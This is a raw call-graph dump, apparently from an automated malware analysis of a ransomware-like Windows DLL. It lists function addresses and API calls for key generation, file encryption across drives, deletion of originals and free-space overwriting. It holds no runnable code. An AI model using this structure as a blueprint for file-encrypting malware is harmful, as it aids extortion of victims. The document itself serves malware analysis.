1531->1532 1533 10003ace 1531->1533 1534 10003ae5 CryptImportKey 1532->1534 1535 10003b16 1532->1535 1536 10003bb0 3 API calls 1533->1536 1538 10003ba3 1534->1538 1539 10003b07 1534->1539 1676 10003c00 1535->1676 1537 10003ad5 1536->1537 1537->1461 1538->1461 1541 10003bb0 3 API calls 1539->1541 1543 10003b0e 1541->1543 1543->1461 1544 10003b22 CryptImportKey 1546 10003b40 1544->1546 1547 10003b86 1544->1547 1545 10003b95 1545->1538 1548 10003b9c CryptDestroyKey 1545->1548 1681 10004350 CryptGenKey 1546->1681 1549 10003bb0 3 API calls 1547->1549 1548->1538 1551 10003b8d 1549->1551 1551->1461 1552 10003b4d 1552->1547 1682 10004040 CryptExportKey 1552->1682 1554 10003b63 1554->1547 1555 10003b7a 1554->1555 1690 10003c40 1554->1690 1557 10003c00 8 API calls 1555->1557 1558 10003b82 1557->1558 1558->1545 1558->1547 1560 100046f3 1559->1560 1561 100046f8 ReadFile CloseHandle 1559->1561 1560->1464 1561->1464 1562->1465 1564 10003bc8 1563->1564 1565 10003bba CryptDestroyKey 1563->1565 1566 10003bdd 1564->1566 1567 10003bcf CryptDestroyKey 1564->1567 1565->1564 1568 10003bf4 CreateThread 1566->1568 1569 10003be4 CryptReleaseContext 1566->1569 1567->1566 1568->1470 1568->1471 2191 10004790 1568->2191 1569->1568 1714 10001590 1570->1714 1572 100057e8 1720 10001830 1572->1720 1574 1000580c 1575 10005814 GetFileAttributesA 1574->1575 1576 10005aae 1574->1576 1577 10005824 1575->1577 1823 10001680 1576->1823 1579 10005881 1577->1579 1580 1000583c time 1577->1580 1730 10004cd0 GetFileAttributesW 1579->1730 1582 10004730 3 API calls 1580->1582 1584 10005850 sprintf 1582->1584 1797 10001080 CreateProcessA 1584->1797 1589 10005875 1591 10001000 5 API calls 1589->1591 1591->1579 1592 100058ba InterlockedExchange 1593 1000591c GetLogicalDrives 1592->1593 1594 1000589b 1592->1594 1593->1594 1594->1576 1594->1592 1594->1593 1595 1000599d InterlockedExchange 1594->1595 1597 1000595f GetDriveTypeW 1594->1597 1598 10001080 6 API calls 1594->1598 1600 10005972 GetDriveTypeW 1594->1600 1606 1000596b 1594->1606 1759 10004a40 SHGetFolderPathW wcslen 1595->1759 1597->1594 1597->1606 1598->1594 1599 100059b8 1601 100059f4 time 1599->1601 1602 100059ce sprintf 1599->1602 1600->1594 1600->1606 1780 10004730 CreateFileA 1601->1780 1604 10001080 6 API calls 1602->1604 1604->1599 1606->1594 1805 10005540 1606->1805 1607 10005a10 sprintf 1608 10001080 6 API calls 1607->1608 1613 10005a09 1608->1613 1609 10005a93 Sleep 1610 100058b6 1609->1610 1611 10005aab 1609->1611 1610->1592 1611->1576 1613->1607 1613->1609 1614 10005a5d GetDriveTypeW 1613->1614 1783 10005190 GetDriveTypeW 1613->1783 1614->1613 1615 10005a84 1614->1615 1615->1613 1616 10005190 29 API calls 1615->1616 1616->1615 1617->1457 1619 100011f5 1618->1619 1620 100011fb GetTokenInformation 1618->1620 1619->1497 1621 1000121a GetLastError 1620->1621 1622 1000122d GlobalAlloc GetTokenInformation 1620->1622 1621->1622 1623 10001225 1621->1623 1624 10001254 1622->1624 1625 1000125a LoadLibraryA 1622->1625 1623->1497 1624->1497 1626 10001269 1625->1626 1627 1000126f GetProcAddress 1625->1627 1626->1497 1628 10001285 1627->1628 1629 1000127f 1627->1629 1630 100012a1 wcscpy 1628->1630 1631 1000129b 1628->1631 1629->1497 1632 100012b8 GlobalFree 1630->1632 1633 100012bf 1630->1633 1631->1497 1632->1633 1633->1497 1635 10004451 LoadLibraryA 1634->1635 1636 1000444a 1634->1636 1637 10004466 6 API calls 1635->1637 1638 100044c6 1635->1638 1636->1504 1637->1638 1638->1504 1639->1515 1640->1521 1659 10003a80 1641->1659 1643 10003d9e 1644 10003e43 1643->1644 1664 10003f00 CreateFileA 1643->1664 1644->1523 1646 10003dbe 1648 10003f00 7 API calls 1646->1648 1651 10003e35 _local_unwind2 1646->1651 1649 10003dda 1648->1649 1650 10003de5 CryptEncrypt 1649->1650 1649->1651 1650->1651 1652 10003e58 CryptDecrypt 1650->1652 1651->1644 1652->1651 1653 10003e82 strncmp 1652->1653 1654 10003ed4 1653->1654 1655 10003eae _local_unwind2 1653->1655 1673 10003ef6 1654->1673 1655->1523 1657->1528 1658->1517 1660 10003a87 CryptAcquireContextA 1659->1660 1661 10003ab0 1660->1661 1662 10003aa7 1660->1662 1661->1643 1662->1660 1663 10003aad 1662->1663 1663->1643 1665 10003f59 GetFileSize 1664->1665 1667 10003f6b _local_unwind2 1664->1667 1666 10003f75 1665->1666 1665->1667 1666->1667 1669 10003f88 GlobalAlloc 1666->1669 1667->1646 1669->1667 1670 10003f99 ReadFile 1669->1670 1670->1667 1671 10003fb4 CryptImportKey 1670->1671 1671->1667 1672 10003fd1 _local_unwind2 1671->1672 1672->1646 1674 10003bb0 3 API calls 1673->1674 1675 10003efd 1674->1675 1675->1644 1677 10003c1b 1676->1677 1678 10003c0e CryptDestroyKey 1676->1678 1679 10003f00 7 API calls 1677->1679 1678->1677 1680 10003b1e 1679->1680 1680->1544 1680->1545 1681->1552 1683 10004099 GlobalAlloc 1682->1683 1686 10004091 _local_unwind2 1682->1686 1685 100040b5 CryptExportKey 1683->1685 1683->1686 1685->1686 1687 100040eb CreateFileA 1685->1687 1686->1554 1687->1686 1688 10004116 WriteFile 1687->1688 1688->1686 1689 1000412e _local_unwind2 1688->1689 1689->1554 1691 10003c67 1690->1691 1692 10003c5d 1690->1692 1699 10004170 1691->1699 1692->1555 1694 10003c7f 1695 10003c90 CreateFileA 1694->1695 1696 10003c88 1694->1696 1697 10003cb0 SetFilePointer WriteFile WriteFile 1695->1697 1698 10003ce6 GlobalFree 1695->1698 1696->1555 1697->1698 1698->1555 1712 10006bd0 1699->1712 1702 100041c2 CryptGetKeyParam 1704 10004206 GlobalAlloc 1702->1704 1705 100041e9 1702->1705 1703 100041b7 1703->1694 1707 10004254 1704->1707 1708 10004237 1704->1708 1705->1694 1706 100042fc 1706->1694 1707->1706 1709 1000427e CryptEncrypt 1707->1709 1708->1694 1709->1707 1710 1000431b GlobalFree 1709->1710 1711 1000432f 1710->1711 1711->1694 1711->1711 1713 1000417a CryptExportKey 1712->1713 1713->1702 1713->1703 1834 10003a10 InitializeCriticalSection 1714->1834 1716 100015b8 1835 10003a10 InitializeCriticalSection 1716->1835 1718 100015c6 1719 100015d3 ??2@YAPAXI 1718->1719 1719->1572 1721 10003ac0 33 API calls 1720->1721 1722 10001843 1721->1722 1723 10001847 1722->1723 1724 1000185c GlobalAlloc 1722->1724 1725 10003ac0 33 API calls 1722->1725 1723->1574 1726 10001875 1724->1726 1727 1000187a GlobalAlloc 1724->1727 1725->1724 1726->1574 1728 10001892 InitializeCriticalSection CreateThread GetTickCount srand 1727->1728 1729 1000188d 1727->1729 1728->1574 1836 100029e0 1728->1836 1729->1574 1731 10004ce9 CopyFileA 1730->1731 1732 10004cfb GetFileAttributesW 1730->1732 1731->1732 1733 10004dd5 1732->1733 1734 10004d0b GetCurrentDirectoryA 1732->1734 1738 10004df0 1733->1738 1735 10004d5b 1734->1735 1736 10004d9e sprintf 1734->1736 1735->1736 1854 10001140 6 API calls 1736->1854 1739 10006bd0 1738->1739 1740 10004dfa GetFileAttributesW 1739->1740 1741 10004e11 fopen 1740->1741 1742 10004f0f 1740->1742 1741->1742 1743 10004e2e fread fclose _wfopen 1741->1743 1748 10005480 SHGetFolderPathW wcslen 1742->1748 1743->1742 1744 10004e7c 1743->1744 1745 10004e85 _ftol sprintf 1744->1745 1746 10004ea8 sprintf 1744->1746 1747 10004ec9 sprintf fwrite fclose 1745->1747 1746->1747 1747->1742 1749 100054e1 SHGetFolderPathW wcslen 1748->1749 1750 100054d3 1748->1750 1752 10005513 1749->1752 1753 10005505 1749->1753 1859 100027f0 ??2@YAPAXI 1750->1859 1755 10004a40 16 API calls 1752->1755 1754 100027f0 168 API calls 1753->1754 1754->1752 1756 10005520 1755->1756 1757 10004a40 16 API calls 1756->1757 1758 1000552d 1757->1758 1758->1594 1760 10004ab9 wcsrchr 1759->1760 1761 10004aac 1759->1761 1762 10004ada wcschr 1760->1762 1763 10004acf 1760->1763 1761->1599 1764 10004b01 1762->1764 1765 10004af6 1762->1765 1763->1599 1766 10004b54 swprintf FindFirstFileW 1764->1766 1767 10004b0b SHGetFolderPathW wcslen 1764->1767 1765->1599 1769 10004bbc 1766->1769 1770 10004baf 1766->1770 1767->1766 1768 10004b33 wcsrchr 1767->1768 1768->1766 1771 10004b4c 1768->1771 1772 10004bca wcscmp 1769->1772 1770->1599 1771->1766 1773 10004c95 FindNextFileW 1772->1773 1774 10004be8 wcscmp 1772->1774 1773->1772 1775 10004cb0 FindClose 1773->1775 1774->1773 1776 10004c06 1774->1776 1775->1599 1776->1773 1777 10004c14 swprintf 1776->1777 1778 10004c4f wcscmp 1776->1778 1777->1776 1778->1773 1779 10004c5e swprintf 1778->1779 1779->1773 1781 10004756 1780->1781 1782 1000475b WriteFile CloseHandle 1780->1782 1781->1613 1782->1613 1784 100052ee 1783->1784 1785 100051cf GlobalAlloc 1783->1785 1784->1613 1785->1784 1786 100051e6 1785->1786 2159 10005120 1786->2159 1788 10005215 CreateFileW 1789 10005239 GlobalFree 1788->1789 1790 1000524a MoveFileExW 1788->1790 1789->1613 1791 10005263 1790->1791 1792 100052cd GlobalFree FlushFileBuffers CloseHandle DeleteFileW 1790->1792 1791->1792 1793 10005269 GetDiskFreeSpaceExW 1791->1793 1794 1000529b WriteFile 1791->1794 1792->1784 1793->1791 1793->1792 1794->1792 1795 100052b3 Sleep 1794->1795 1795->1794 1796 100052bd Sleep 1795->1796 1796->1792 1796->1793 1798 10001135 1797->1798 1799 100010dd 1797->1799 1798->1589 1800 100010e5 WaitForSingleObject 1799->1800 1801 10001116 FindCloseChangeNotification CloseHandle 1799->1801 1802 10001102 1800->1802 1803 100010f5 TerminateProcess 1800->1803 1801->1589 1802->1801 1804 1000110a GetExitCodeProcess 1802->1804 1803->1802 1804->1801 1806 100055f2 GetDriveTypeW 1805->1806 1807 10005577 InterlockedExchangeAdd 1805->1807 1808 10005668 1806->1808 1810 10005604 InterlockedExchange 1806->1810 1807->1808 1809 1000558c 1807->1809 1808->1606 1812 1000559a GetDiskFreeSpaceExW 1809->1812 1815 100055c6 Sleep 1809->1815 1818 100055de GetDriveTypeW 1809->1818 1811 10005610 GetDriveTypeW 1810->1811 1813 10005653 1811->1813 1814 10005623 1811->1814 1812->1809 1812->1815 1817 100027f0 168 API calls 1813->1817 1816 10005060 14 API calls 1814->1816 1815->1812 1819 100055d3 1815->1819 1820 10005644 1816->1820 1817->1808 1818->1808 1821 100055f0 1818->1821 1819->1606 2170 10001910 wcscpy swprintf 1820->2170 1821->1811 2171 10001760 1823->2171 1826 100016fe ??3@YAXPAX 1828 10001728 1826->1828 1827 100016c5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N ??3@YAXPAX 1827->1827 1829 100016fd 1827->1829 2184 10003a60 DeleteCriticalSection 1828->2184 1829->1826 1831 10001734 2185 10003a60 DeleteCriticalSection 1831->2185 1833 10001744 1833->1439 1833->1480 1834->1716 1835->1718 1839 100029f0 1836->1839 1840 10002a04 1839->1840 1841 10002b88 ExitThread 1839->1841 1840->1841 1842 10002a12 Sleep 1840->1842 1843 10002a2f EnterCriticalSection 1840->1843 1845 10002a68 wcslen 1840->1845 1852 10002b46 ??3@YAXPAX 1840->1852 1853 10002b3a ??3@YAXPAX 1840->1853 1842->1840 1843->1840 1844 10002b6f LeaveCriticalSection 1843->1844 1844->1840 1844->1841 1846 10002ae4 DeleteFileW 1845->1846 1847 10002a76 MoveFileExW 1845->1847 1846->1840 1850 10002aef GetFileAttributesW SetFileAttributesW MoveFileExW 1846->1850 1848 10002a84 GetFileAttributesW 1847->1848 1849 10002aab swprintf MoveFileExW 1847->1849 1848->1849 1851 10002a90 GetFileAttributesW SetFileAttributesW MoveFileExW 1848->1851 1849->1840 1849->1846 1850->1840 1851->1849 1852->1840 1852->1844 1853->1852 1855 10001190 1854->1855 1856 10001198 fprintf fclose 1854->1856 1855->1733 1857 10001080 6 API calls 1856->1857 1858 100011c1 1857->1858 1858->1733 1869 10002300 ??2@YAPAXI 1859->1869 1861 100028b8 1927 10002ba0 1861->1927 1864 10002853 1864->1861 1866 10002885 ??3@YAXPAX 1864->1866 1916 10002940 1864->1916 1865 100028c1 1867 10002912 ??3@YAXPAX 1865->1867 1868 100028eb ??3@YAXPAX 1865->1868 1866->1864 1867->1749 1868->1865 1868->1867 1944 10003730 ??2@YAPAXI 1869->1944 1872 10002413 1946 10002f70 GetTempFileNameW CreateFileW 1872->1946 1873 100023af 1978 100036a0 1873->1978 1876 100023cd ??3@YAXPAX 1984 100037c0 1876->1984 1879 10002438 wcscmp 1882 1000262a FindNextFileW 1879->1882 1883 1000244f wcscmp 1879->1883 1880 100027c9 1880->1864 1881 10002642 FindClose 1884 1000265a 1881->1884 1899 10002686 1881->1899 1882->1881 1888 10002419 1882->1888 1883->1882 1885 10002466 swprintf 1883->1885 1886 10002940 103 API calls 1884->1886 1897 10003760 ??2@YAPAXI 1884->1897 1884->1899 1885->1888 1886->1884 1887 10002694 _wcsnicmp 1892 100026b4 1887->1892 1888->1879 1888->1881 1888->1882 1889 1000252b wcscmp 1888->1889 1894 100024b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 1888->1894 1914 100025bf wcsncpy wcsncpy 1888->1914 1949 100032c0 _wcsnicmp 1888->1949 1987 10002d60 wcsrchr 1888->1987 1889->1882 1891 10002542 wcscmp 1889->1891 1891->1882 1898 10002559 wcscmp 1891->1898 1905 10002706 1892->1905 1975 10003200 swprintf CopyFileW 1892->1975 1893 10002746 1896 10002771 ??3@YAXPAX 1893->1896 1912 1000276d 1893->1912 2006 10003620 1893->2006 1971 100035c0 ??2@YAPAXI 1894->1971 1903 100027b7 ??3@YAXPAX 1896->1903 1904 1000278e ??3@YAXPAX 1896->1904 1897->1884 1898->1882 1898->1888 1899->1887 1899->1892 1901 100026f9 1907 10002701 1901->1907 1908 10002708 1901->1908 1903->1880 1904->1903 1904->1904 1905->1893 1910 10002300 141 API calls 1905->1910 1976 10003280 swprintf CopyFileW 1907->1976 1977 10003240 swprintf CopyFileW 1908->1977 1910->1905 1912->1896 2004 10003760 ??2@YAPAXI 1914->2004 1917 10002953 1916->1917 1918 100029b1 DeleteFileW 1917->1918 1919 10002973 1917->1919 1920 100029aa 1917->1920 1921 1000295f 1917->1921 1918->1920 1923 10002200 100 API calls 1919->1923 1920->1864 2025 10002200 1921->2025 1925 1000297d 1923->1925 1924 10002969 1924->1864 1925->1920 1926 10002981 wcscat wcscat 1925->1926 1926->1920 1928 10002bcb wcslen 1927->1928 1929 10002cfd wcslen 1927->1929 1930 10002be2 1928->1930 1931 10002bef EnterCriticalSection wcslen ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 1928->1931 1932 10002d11 DeleteFileW 1929->1932 1933 10002d18 1929->1933 2137 10003010 1930->2137 1935 10002c48 ??2@YAPAXI 1931->1935 1938 10002c2d 1931->1938 1932->1933 1933->1865 1937 10002c65 1935->1937 1936 10002bec 1936->1931 1939 10003810 7 API calls 1937->1939 1938->1935 1940 10002c8a 1939->1940 1941 10002cde LeaveCriticalSection 1940->1941 1942 10002cd2 ??3@YAXPAX 1940->1942 1943 10002cae LeaveCriticalSection 1940->1943 1941->1865 1942->1941 1943->1865 1945 10002363 swprintf FindFirstFileW 1944->1945 1945->1872 1945->1873 1947 10002fc7 CloseHandle DeleteFileW 1946->1947 1948 10002fdd 1946->1948 1947->1948 1948->1888 1950 100032e2 wcsstr 1949->1950 1951 100032ef 1949->1951 1950->1951 1952 10003300 _wcsicmp 1951->1952 1953 100033b9 _wcsicmp 1951->1953 1954 10003312 1952->1954 1955 1000331d _wcsicmp 1952->1955 1956 100033d7 _wcsicmp 1953->1956 1957 100033cc 1953->1957 1954->1888 1960 10003337 _wcsicmp 1955->1960 1961 1000332c 1955->1961 1958 100033f1 _wcsicmp 1956->1958 1959 100033e6 1956->1959 1957->1888 1958->1888 1959->1888 1962 10003351 _wcsicmp 1960->1962 1963 10003346 1960->1963 1961->1888 1964 10003360 1962->1964 1965 1000336b _wcsicmp 1962->1965 1963->1888 1964->1888 1966 10003385 wcsstr 1965->1966 1967 1000337a 1965->1967 1968 10003394 1966->1968 1969 1000339f wcsstr 1966->1969 1967->1888 1968->1888 1969->1953 1970 100033ae 1969->1970 1970->1888 1972 100035df 1971->1972 2011 10003810 1972->2011 1974 10002508 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 1974->1882 1975->1901 1976->1905 1977->1905 1979 1000371a 1978->1979 1982 100036b0 1978->1982 1979->1876 1980 100036ec ??3@YAXPAX 1980->1982 1983 1000370d 1980->1983 1981 100036e0 ??3@YAXPAX 1981->1980 1982->1980 1982->1981 1983->1876 1985 100037d1 ??3@YAXPAX 1984->1985 1986 100023ff ??3@YAXPAX 1984->1986 1985->1985 1985->1986 1986->1880 1988 10002d79 1987->1988 1989 10002d7f _wcsicmp 1987->1989 1988->1888 1990 10002d98 _wcsicmp 1989->1990 1991 10002e5b 1989->1991 1990->1991 1992 10002dab _wcsicmp 1990->1992 1991->1888 1993 10002dc5 1992->1993 1994 10002dba 1992->1994 1995 10002dd3 _wcsicmp 1993->1995 1996 10002dea 1993->1996 1994->1888 1995->1993 1997 10002e11 1995->1997 1998 10002e27 _wcsicmp 1996->1998 1999 10002df8 _wcsicmp 1996->1999 2003 10002e0f 1996->2003 1997->1888 2001 10002e41 _wcsicmp 1998->2001 2002 10002e36 1998->2002 1999->1996 2000 10002e1c 1999->2000 2000->1888 2001->1888 2002->1888 2003->1998 2005 1000377f 2004->2005 2005->1882 2007 10003660 ??3@YAXPAX 2006->2007 2008 10003641 2006->2008 2007->1893 2009 10003654 ??3@YAXPAX 2008->2009 2010 1000364d 2008->2010 2009->2007 2010->2007 2012 10003840 2011->2012 2017 10003944 2011->2017 2013 10003868 2012->2013 2019 100038db 2012->2019 2015 10003874 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 2013->2015 2016 1000386e ?_Xran@std@ 2013->2016 2014 10003935 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 2014->2017 2020 10003885 2015->2020 2016->2015 2017->1974 2018 100038c0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 2018->1974 2019->2014 2021 100038f5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 2019->2021 2020->2018 2022 100038a1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 2020->2022 2023 10003906 2021->2023 2022->2018 2024 100038b7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 2022->2024 2023->1974 2024->2018 2026 1000227a swprintf 2025->2026 2027 1000221a wcscpy wcsrchr 2025->2027 2030 1000229a GetFileAttributesW 2026->2030 2028 10002265 2027->2028 2029 10002245 _wcsicmp 2027->2029 2032 1000226f wcscat 2028->2032 2031 1000225e wcscpy 2029->2031 2029->2032 2033 100022d8 2030->2033 2034 100022aa 2030->2034 2031->2030 2032->2030 2036 100022e7 2033->2036 2038 10002ba0 29 API calls 2033->2038 2040 10001960 2034->2040 2036->1924 2037 100022ba 2037->2033 2039 100022be DeleteFileW 2037->2039 2038->2036 2039->1924 2041 10001a12 CreateFileW 2040->2041 2042 10001a07 2040->2042 2043 10001a74 GetFileSizeEx 2041->2043 2044 10001a34 2041->2044 2042->2041 2045 10001a91 GetFileTime ReadFile 2043->2045 2046 10001a86 2043->2046 2044->2046 2052 10001a48 CreateFileW 2044->2052 2048 10001b98 SetFilePointer 2045->2048 2049 10001ace 2045->2049 2047 1000208e _local_unwind2 2046->2047 2047->2037 2050 10001bb7 swprintf CreateFileW 2048->2050 2051 10001c5b ReadFile 2048->2051 2049->2048 2053 10001ae8 ReadFile 2049->2053 2054 10001c01 CreateFileW 2050->2054 2063 10001c38 2050->2063 2051->2046 2056 10001c7f 2051->2056 2052->2043 2055 10001a6a 2052->2055 2053->2048 2057 10001b0e 2053->2057 2054->2046 2054->2063 2055->2047 2056->2046 2058 10001c8f SetFilePointer WriteFile 2056->2058 2057->2048 2059 10001b22 ReadFile 2057->2059 2058->2046 2061 10001cbc 2058->2061 2059->2048 2062 10001b44 ReadFile 2059->2062 2060 10001d66 2098 10004370 2060->2098 2061->2046 2065 10001ccc SetFilePointer WriteFile 2061->2065 2062->2048 2067 10001b67 2062->2067 2063->2060 2071 10001d54 rand 2063->2071 2065->2046 2066 10001d09 2065->2066 2066->2046 2069 10001d19 SetFilePointer 2066->2069 2067->2048 2070 10001b72 _local_unwind2 2067->2070 2068 10001dba 2068->2046 2107 10005dc0 2068->2107 2069->2063 2070->2037 2071->2060 2073 10001de3 WriteFile 2073->2046 2075 10001e30 WriteFile 2073->2075 2075->2046 2076 10001e51 WriteFile 2075->2076 2076->2046 2077 10001e77 WriteFile 2076->2077 2077->2046 2078 10001e95 WriteFile 2077->2078 2078->2046 2079 10001eb6 2078->2079 2080 100020b7 SetFileTime 2079->2080 2083 10001ee5 SetFilePointer ReadFile 2079->2083 2093 10001f9b 2079->2093 2081 10002130 CloseHandle MoveFileW 2080->2081 2082 100020da FindCloseChangeNotification CloseHandle MoveFileW 2080->2082 2087 10002158 _local_unwind2 2081->2087 2085 10002110 SetFileAttributesW 2082->2085 2086 10002121 DeleteFileW 2082->2086 2083->2046 2088 10001f19 2083->2088 2084 100020ab 2084->2080 2085->2087 2086->2087 2087->2037 2088->2046 2091 10006940 12 API calls 2088->2091 2090 10001fcc ReadFile 2090->2046 2090->2093 2092 10001f46 WriteFile 2091->2092 2092->2046 2094 10001f6a 2092->2094 2093->2046 2093->2084 2093->2090 2114 10006940 2093->2114 2094->2046 2095 10001f7a SetFilePointer 2094->2095 2095->2093 2099 10004386 2098->2099 2100 1000437d 2098->2100 2127 10004420 CryptGenRandom 2099->2127 2100->2068 2102 10004397 2103 1000439b 2102->2103 2104 100043b2 EnterCriticalSection CryptEncrypt 2102->2104 2103->2068 2105 10004401 LeaveCriticalSection 2104->2105 2106 100043f2 LeaveCriticalSection 2104->2106 2105->2103 2106->2068 2108 10005df4 2107->2108 2109 10005dce ??0exception@@QAE@ABQBD _CxxThrowException 2107->2109 2110 10005e2d 2108->2110 2111 10005e07 ??0exception@@QAE@ABQBD _CxxThrowException 2108->2111 2109->2108 2112 10005e40 ??0exception@@QAE@ABQBD _CxxThrowException 2110->2112 2113 10005e66 2110->2113 2111->2110 2112->2113 2113->2073 2113->2113 2115 10006950 ??0exception@@QAE@ABQBD _CxxThrowException 2114->2115 2116 1000696e 2114->2116 2115->2116 2117 10006b7c ??0exception@@QAE@ABQBD _CxxThrowException 2116->2117 2125 10006990 2116->2125 2118 10006b34 2119 10006640 4 API calls 2118->2119 2126 1000205a WriteFile 2118->2126 2119->2118 2120 10006640 4 API calls 2122 10006a69 2120->2122 2121 10006a4b ??0exception@@QAE@ABQBD _CxxThrowException 2121->2122 2122->2118 2122->2120 2124 10006b16 ??0exception@@QAE@ABQBD _CxxThrowException 2122->2124 2122->2126 2124->2118 2125->2121 2125->2122 2125->2125 2125->2126 2128 10006640 2125->2128 2126->2046 2126->2093 2127->2102 2129 10006650 ??0exception@@QAE@ABQBD _CxxThrowException 2128->2129 2130 1000666e 2128->2130 2129->2130 2133 10006694 2130->2133 2134 10006280 2130->2134 2133->2125 2135 10006291 ??0exception@@QAE@ABQBD _CxxThrowException 2134->2135 2136 100062af 2134->2136 2135->2136 2136->2125 2138 10006bd0 2137->2138 2139 1000301a GetFileAttributesW 2138->2139 2140 10003030 2139->2140 2141 1000303c 2139->2141 2140->1936 2142 10003040 SetFileAttributesW 2141->2142 2143 1000304a CreateFileW 2141->2143 2142->2143 2144 100030a3 GetFileSizeEx 2143->2144 2145 10003066 2143->2145 2146 100030bf 2144->2146 2150 100030ea 2144->2150 2147 10003073 2145->2147 2148 1000307d CreateFileW 2145->2148 2158 10004420 CryptGenRandom 2146->2158 2147->1936 2148->2144 2149 10003097 2148->2149 2149->1936 2152 10003161 2150->2152 2153 10003142 SetFilePointer 2150->2153 2154 1000316e WriteFile FlushFileBuffers SetFilePointer 2152->2154 2153->2154 2155 100031e9 FindCloseChangeNotification 2154->2155 2157 10003195 2154->2157 2155->1936 2156 100031ba WriteFile 2156->2157 2157->2155 2157->2156 2158->2150 2162 10005060 GetWindowsDirectoryW 2159->2162 2161 10005150 swprintf DeleteFileW 2161->1788 2163 100050d0 swprintf CreateDirectoryW sprintf 2162->2163 2164 1000508e GetTempPathW wcslen 2162->2164 2167 10001080 6 API calls 2163->2167 2165 10005115 2164->2165 2166 100050aa wcslen 2164->2166 2165->2161 2166->2165 2168 100050b8 wcslen 2166->2168 2169 10005112 2167->2169 2168->2161 2169->2165 2170->1813 2172 10003bb0 3 API calls 2171->2172 2173 1000176c 2172->2173 2174 10003bb0 3 API calls 2173->2174 2175 10001774 2174->2175 2176 100017a3 2175->2176 2180 10001790 GlobalFree 2175->2180 2177 100017cc 2176->2177 2181 100017b9 GlobalFree 2176->2181 2178 10001800 DeleteCriticalSection wcslen 2177->2178 2179 100017d6 WaitForSingleObject CloseHandle 2177->2179 2182 10001821 DeleteFileW 2178->2182 2183 100016b2 2178->2183 2179->2178 2180->2176 2181->2177 2182->2183 2183->1826 2183->1827 2184->1831 2185->1833 2187 100045cc 2186->2187 2188 10004500 21 API calls 2187->2188 2189 100045e7 ExitThread 2187->2189 2190 100045de Sleep 2187->2190 2188->2187 2190->2187 2192 100047da ExitThread 2191->2192 2193 1000479c 2191->2193 2193->2192 2194 100047a8 time 2193->2194 2196 100047c4 Sleep 2193->2196 2195 10004730 3 API calls 2194->2195 2195->2193 2196->2193 2198 100049a6 time 2197->2198 2199 10004a24 Sleep 2198->2199 2203 100049b7 2198->2203 2199->2198 2200 100049c6 time 2201 10001000 5 API calls 2200->2201 2201->2203 2203->2199 2203->2200 2204 100049eb GetFullPathNameA 2203->2204 2219 10004890 2203->2219 2228 100047f0 2204->2228 2207 10005745 Sleep GetLogicalDrives 2206->2207 2208 100057af ExitThread 2206->2208 2209 10005760 2207->2209 2209->2207 2209->2208 2210 10005781 CreateThread 2209->2210 2210->2209 2211 10005799 CloseHandle 2210->2211 2249 10005680 2210->2249 2211->2209 2213 10005337 2212->2213 2214 10005309 2212->2214 2215 10001080 6 API calls 2214->2215 2216 1000531e Sleep 2215->2216 2216->2214 2217 10005331 2216->2217 2235 10001360 AllocateAndInitializeSid 2219->2235 2221 1000489c 2222 100048a9 GetFullPathNameA sprintf 2221->2222 2223 10004913 CreateProcessA 2221->2223 2224 10001080 6 API calls 2222->2224 2226 10004969 CloseHandle CloseHandle 2223->2226 2227 1000497f 2223->2227 2225 10004907 2224->2225 2225->2223 2225->2227 2226->2227 2227->2203 2229 10001360 3 API calls 2228->2229 2230 10004810 2229->2230 2240 100014a0 GetComputerNameW wcslen 2230->2240 2233 10001080 6 API calls 2234 1000487d 2233->2234 2234->2203 2236 100013a6 2235->2236 2237 100013ab CheckTokenMembership 2235->2237 2236->2221 2238 100013c0 2237->2238 2239 100013c4 FreeSid 2237->2239 2238->2239 2239->2221 2241 10001517 srand rand 2240->2241 2242 100014f7 2240->2242 2244 10001533 2241->2244 2243 100014fb wcslen 2242->2243 2243->2241 2243->2243 2245 10001548 rand 2244->2245 2246 1000155d 2244->2246 2245->2245 2245->2246 2247 10001564 rand 2246->2247 2248 10001579 sprintf 2246->2248 2247->2247 2247->2248 2248->2233 2250 10001590 2 API calls 2249->2250 2251 100056a4 2250->2251 2252 10001830 57 API calls 2251->2252 2253 100056c7 2252->2253 2254 100056f8 2253->2254 2255 100056cb 2253->2255 2257 10005540 191 API calls 2254->2257 2256 10001680 14 API calls 2255->2256 2258 100056df 2256->2258 2259 1000570d 2257->2259 2260 10005190 29 API calls 2259->2260 2261 10005713 2260->2261 2262 10001760 10 API calls 2261->2262 2263 1000571f ExitThread 2262->2263 2281 10003500 2282 10003543 ??3@YAXPAX 2281->2282 2283 1000350f 2281->2283 2284 10003510 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N ??3@YAXPAX 2283->2284 2284->2284 2285 10003542 2284->2285 2285->2282 2302 10003a40 2307 10003a60 DeleteCriticalSection 2302->2307 2304 10003a48 2305 10003a58 2304->2305 2306 10003a4f ??3@YAXPAX 2304->2306 2306->2305 2307->2304 2324 10003560 2325 10003595 ??3@YAXPAX 2324->2325 2326 1000356e ??3@YAXPAX 2324->2326 2326->2325 2326->2326 2327 10001660 2328 10001680 14 API calls 2327->2328 2329 10001668 2328->2329 2330 10001678 2329->2330 2331 1000166f ??3@YAXPAX 2329->2331 2331->2330 2294 10005727 2295 10005730 GetLogicalDrives 2294->2295 2296 10005745 Sleep GetLogicalDrives 2295->2296 2297 100057af ExitThread 2295->2297 2298 10005760 2296->2298 2298->2296 2298->2297 2299 10005781 CreateThread 2298->2299 2299->2298 2300 10005799 CloseHandle 2299->2300 2301 10005680 277 API calls 2299->2301 2300->2298 2274 100021ac 2275 100021b7 CloseHandle 2274->2275 2276 100021be 